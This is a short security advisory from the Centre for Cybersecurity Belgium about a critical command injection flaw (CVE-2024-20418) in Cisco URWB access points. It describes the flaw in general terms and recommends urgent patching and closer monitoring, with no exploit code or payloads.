www.belgium.be Logo of the federal government

Warning: Critical Command Injection In Cisco URWB With Root Privileges, Perfect CVSS 10 Score, Patch Immediately!

Référence: 
Advisory #2024-258
Version: 
1.0
Logiciels concernés : 
Cisco products running a vulnerable release and having the Ultra-Reliable Wireless Backhaul operating mode enabled.
Catalyst IW9165D Heavy Duty Access Points
Catalyst IW9165E Rugged Access Points and Wireless Clients
Catalyst IW9167E Heavy Duty Access Points
Type: 
Command Injection
CVE/CVSS: 

CVE-2024-20418: CVSS 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Sources

Cisco: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs

Risques

The vulnerability has a perfect CVSS score of 10, meaning it has severe impact to the confidentiality, integrity, and availability of the affected systems. A threat actor can perform the attack remotely and they don’t need any prior authentication into the system, or user interaction.

Description

CVE-2024-20418 is a command injection vulnerability caused by improper input validation. It affects the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points.

An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system, giving him the ability to execute arbitrary commands with root privileges in the underlying operating system of the affected device.

Visit the vendor’s advisory for more information: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs

Actions recommandées

Patch

The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority, after thorough testing.

Monitor/Detect

The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity, ensuring a swift response in case of an intrusion.

In case of an intrusion, you can report an incident via: https://ccb.belgium.be/en/cert/report-incident.

While patching appliances or software to the newest version may provide safety from future exploitation, it does not remediate historic compromise.

Plus d’information

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-20418